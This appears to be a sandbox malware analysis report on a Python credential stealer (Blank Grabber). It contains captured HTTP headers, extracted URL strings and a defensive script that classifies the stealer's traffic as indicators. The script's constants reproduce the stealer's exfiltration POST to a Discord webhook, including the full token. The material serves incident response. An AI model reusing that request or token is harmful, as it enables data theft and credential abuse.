                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8dnofcTgJO77a0qvnY06ZSBgJThFUi8RPU8CzONyuww46HrhNSYoQIulPhbjpsHEv8wynrDDGIVboMnd6LkVRJj0bS6cflMBGGEW9Mg25a0WM87vZtObL%2FuVdqpj"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  X-Content-Type-Options: nosniff
                  Set-Cookie: __cfruid=bfbee4d8f0c66307eb752299893c7bde277a9e1d-1732387480; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                  Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                  Set-Cookie: _cfuvid=r8z8dclj1LJ.4o5SqnVjdAiCBtWH7bkTOCEb1MOHljw-1732387480233-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8e734fba9c4d8c7e-EWR
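              The two requests above are the sample's entire network footprint in this run: a geolocation lookup to ip-api.com and a multipart POST of roughly 700 KB to the Discord webhook found in the extracted configuration, both sent by python-urllib3 (the _MEI72642 extraction directory and the python310.pdb string elsewhere in this report are the PyInstaller onefile signature, so the stealer is a bundled Python program). Discord answered 404 Not Found, which is the response for a webhook that no longer exists or is invalid, so the archive was rejected rather than delivered in this run; a 2xx here would have meant successful exfiltration, and a 429 would have meant the rate limit advertised in the x-ratelimit-* headers was hit. The block below is an added example, not from the report or from Blank Grabber: it turns such an exchange into indicators a responder can act on. The request and response text are reconstructed from the lines above (headers put back on separate lines, response body omitted, remaining headers trimmed); the webhook token is redacted in the output.

```python
import re

# Constructed from the traffic shown above: each header on its own line, response body omitted.
GEO_REQUEST = (
    "GET /json/?fields=225545 HTTP/1.1\r\n"
    "Host: ip-api.com\r\n"
    "Accept-Encoding: identity\r\n"
    "User-Agent: python-urllib3/2.2.3\r\n\r\n"
)
WEBHOOK_REQUEST = (
    "POST /api/webhooks/1309732604697772032/"
    "jYDmGek7yWvABusaZDozvumeMuAZjheHcNL9cOnpMCpam2eP5UOyLvUjSMysvJJlJbg0 HTTP/1.1\r\n"
    "Host: discord.com\r\n"
    "Accept-Encoding: identity\r\n"
    "Content-Length: 699973\r\n"
    "User-Agent: python-urllib3/2.2.3\r\n"
    "Content-Type: multipart/form-data; boundary=deddcaf575f75e2dd616d5b567df1560\r\n\r\n"
)
WEBHOOK_RESPONSE = (
    "HTTP/1.1 404 Not Found\r\n"
    "Content-Type: application/json\r\n"
    "Content-Length: 45\r\n"
    "x-ratelimit-limit: 5\r\n"
    "x-ratelimit-remaining: 4\r\n"
    "Server: cloudflare\r\n\r\n"
)

# Discord webhook path: numeric snowflake id followed by a long URL-safe token.
WEBHOOK_RE = re.compile(r"^/api/(?:v\d+/)?webhooks/(\d{17,20})/([A-Za-z0-9_-]{60,})$")
AUTOMATED_UA = ("python-urllib3", "python-requests", "curl/", "Wget/")
GEO_HOSTS = {"ip-api.com", "ipinfo.io", "api.ipify.org"}  # common "where am I" services


def parse_http(raw: str):
    """Split an HTTP message head into (start line, {lower-cased header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        headers[key.strip().lower()] = value.strip()
    return lines[0], headers


def defang(host: str) -> str:
    """Make a hostname safe to paste into tickets and chat (discord.com -> discord[.]com)."""
    return host.replace(".", "[.]")


def classify_request(raw: str) -> dict:
    """Label a request as geolocation lookup, Discord webhook exfil or other, with extracted IOCs."""
    start, headers = parse_http(raw)
    method, path, _version = start.split(" ", 2)
    host = headers.get("host", "")
    ua = headers.get("user-agent", "")
    info = {
        "method": method,
        "host": defang(host),
        "path": path,
        "user_agent": ua,
        "automated_client": ua.startswith(AUTOMATED_UA),
        "body_length": int(headers.get("content-length", "0")),
        "category": "other",
    }
    m = WEBHOOK_RE.match(path)
    if host == "discord.com" and m:
        info["category"] = "discord_webhook"
        info["webhook_id"] = m.group(1)
        info["webhook_token"] = m.group(2)[:6] + "..."  # redacted: the token is a credential
    elif host in GEO_HOSTS:
        info["category"] = "geolocation_lookup"
    return info


def judge_exfil(request_raw: str, response_raw: str) -> dict:
    """Combine the webhook request with its response to say whether the upload got through."""
    info = classify_request(request_raw)
    status_line, headers = parse_http(response_raw)
    status = int(status_line.split(" ")[1])
    info["status"] = status
    info["ratelimit_remaining"] = headers.get("x-ratelimit-remaining")
    if 200 <= status < 300:
        info["verdict"] = "delivered"
    elif status == 404:
        info["verdict"] = "rejected"      # webhook deleted or invalid: nothing reached the operator
    elif status == 429:
        info["verdict"] = "rate_limited"  # retry likely; treat the data as at risk
    else:
        info["verdict"] = "unknown"
    return info


if __name__ == "__main__":
    print(classify_request(GEO_REQUEST))
    print(judge_exfil(WEBHOOK_REQUEST, WEBHOOK_RESPONSE))
```

              The verdict only describes this one sandbox run: a webhook that returns 404 today may have been live when the sample was first distributed, so the browser, wallet and messaging data the stealer collected on a real host should still be treated as compromised.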
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700295776.00000162C435C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000002.2112093875.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700295776.00000162C435C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.dr, _hashlib.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.dr, _hashlib.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000002.2112093875.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: cmd.exe, 00000001.00000002.2097860677.000001C916A25000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
              Source: cmd.exe, 00000001.00000003.2093290332.000001C91692B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2097775097.000001C91692B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.comodo
              Source: cmd.exe, rar.exe.0.dr; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: cmd.exe, 00000001.00000003.2093373863.000001C916899000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2092429001.000001C91689F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2092429001.000001C91686B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2094158420.000001C916A4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091622217.000001C9172D4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2096563852.000001C91686B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2098181840.000001C916A4D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1936844561.0000022BF4E10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.2946092630.00000240CA6B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1915922706.00000216A4AC8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: cmd.exe, 00000001.00000003.2092429001.000001C91686B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1756903455.000001C91687D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2096563852.000001C91686B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.comodoi
              Source: powershell.exe, 0000000A.00000002.1944041787.0000022BF5308000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.m
              Source: powershell.exe, 0000000A.00000002.1941584429.0000022BF4FD3000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microsus
              Source: cmd.exe; String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: cmd.exe; String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: cmd.exe, 00000000.00000003.1701072162.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.dr; String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701072162.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.dr; String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: powershell.exe, 0000000A.00000002.1936844561.0000022BF4E10000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.v
              Source: svchost.exe, 0000001C.00000002.2945905884.00000240CA600000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.ver)
              Source: cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000002.2112093875.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700295776.00000162C435C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.dr, _hashlib.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.dr, _hashlib.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: _lzma.pyd.0.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700295776.00000162C435C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700295776.00000162C435C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.dr, _hashlib.pyd.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700295776.00000162C435C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
              Source: cmd.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: cmd.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: cmd.exe, 00000000.00000003.1701072162.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: cmd.exe, 00000001.00000003.1711840734.000001C916513000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1710834242.000001C916513000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1707179329.000001C916513000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1713839904.000001C916513000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1710533213.000001C916513000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-
              Source: cmd.exe, 00000001.00000003.1710834242.000001C9164F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: svchost.exe, 0000001C.00000003.1775846241.00000240CA818000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: edb.log.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
              Source: edb.log.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: edb.log.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: svchost.exe, 0000001C.00000003.1775846241.00000240CA818000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: svchost.exe, 0000001C.00000003.1775846241.00000240CA818000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: svchost.exe, 0000001C.00000003.1775846241.00000240CA84D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: edb.log.28.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: cmd.exe, 00000001.00000002.2097860677.000001C9169B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: cmd.exe, 00000001.00000002.2096563852.000001C916813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: cmd.exe, 00000001.00000002.2097860677.000001C9169B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr;
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr;r
